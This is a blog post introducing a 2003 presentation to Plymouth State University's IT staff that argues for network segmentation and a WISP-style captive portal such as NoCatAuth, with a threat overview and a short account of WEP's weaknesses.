Back in the Fall of 2003, PSU was still considering its wireless plans. Things were moving slowly, and the decision makers seemed to be looking for answers in the wrong places. I’d been agitating for better answers, a simpler solution, lower costs, and more progress. My criticism landed me on the hot seat, and I was soon asked to be more constructive. My answers are in this presentation, the accompanying handout, and a handout for a followup meeting.
At the time, the networking staff was leaning towards a proprietary 802.1x-based authentication scheme that required specific client software and had limited hardware support. The package was rather pricey, would have required additional client software and hardware purchases, and was restrictive in its support of student computers. At an institution that supports over 7000 users, most of whom purchase and maintain their own equipment, the plan seemed to have a lot of shortcomings. I wanted the school to look at the Wireless ISP model, and consider the options used there. I also wanted the networking folks to explore network security over-all, rather than just wireless security, as most network threats affect wired and wireless networks in similar ways.
I no longer work in the IT shop, where I was a sys admin at the time, but this presentation and my arguments may have been successful. The school selected a commercial captive portal authentication system, just like the WISPs. A lot has changed in the wireless market over the intervening year, but I’m offering the presentation here anyway.
Plymouth State University
IT Systems & Networking Staff
Security By Isolation
[graphic slides removed, see PDF]
Networked, But Isolated
- Group computers according to users and their activities
- Aggressive firewalling as appropriate by group
- Limit access to networks by group association
- Also to consider: NAT and NoCatAuth
Policy Based Networking
- Update our old ideas of ‘private’ and ‘public’ networks
- Make the logical structure of our network match our access and security policy
- Develop mechanisms to support and enforce this policy
- Attacks originating outside our network
- Attacks originating from within our network on targets here or elsewhere
- Man-in-the-middle; interception (sniffing) and manipulation of data en-route
- The Vandal
Denial of service, random damage, data loss
- The Brigand
Uses our resources in support of greater crimes
- The Thief
Data theft or manipulation
From Whom Are We Vulnerable?
- We fear miscreants and hackers
- Every user, authorized and unauthorized, is a potential threat
- Threats from ‘authorized’ users, while perhaps less likely, are more directed
Who Are We Trying to Serve?
- About 7,000 Faculty, Staff and Students now have computer accounts and privileges here Do we trust every one of them? So…
- Any decisions about network security must be made with the recognition that we have a huge number of un-trusted users.
- WEP is shared encryption…
- No matter how you distribute it or how often you change the key, all ‘authorized’ WEP users can see and sniff all other WEP ‘encrypted’ traffic
- …And you don’t even have to crack it…
- WEP encrypted traffic is sent with IP information in the clear Packets can be intercepted, re-addressed, and re-sent through the AP to a host on the wired network The AP does the decryption, allowing even unauthorized users to easily sniff traffic
Is There An 802.11 Standard That Works?
- There is lots of activity to find a real solution to WEP’s failures, but…
- Interoperability is two to three years away What Can We Do Now?
- First, we must recognize that many of the risks of wireless also exist on our wired network
- And, yes, wireless will always be less secure than wired communications
- With that in mind, let’s figure out how to secure our entire network
- Wireless Hacks by Rob Flickenger O’Reilly Press, 2003
- Network Magazine CMP United Business Media Remember to be conscious of context Most of the work and reporting is directed to corporate users
Similar Service Models
- Because of the number and types of customers we serve, we’re more like a public service, a utility, an ISP
- We should look to WISPs — wireless internet service providers — for solutions
The WISP Model
- Low minimum requirements for client software and hardware — 802.11b wireless with recent browser
- Use ‘clientless’ authentication — enter credentials in secure web page
- Depend on application layer security, warn customers to do the same
- Is secure enough to prevent abuse and theft of service
What Is NoCatAuth?
- An open-source captive portal for network authentication and client management.
- Integrates DHCP, firewall, and authentication services.
- Uses web browser interface to take credentials, changes firewall behavior based on authentication. Looks for and reports ARP spoofing.
- Free for client and server; requires no additional client configuration.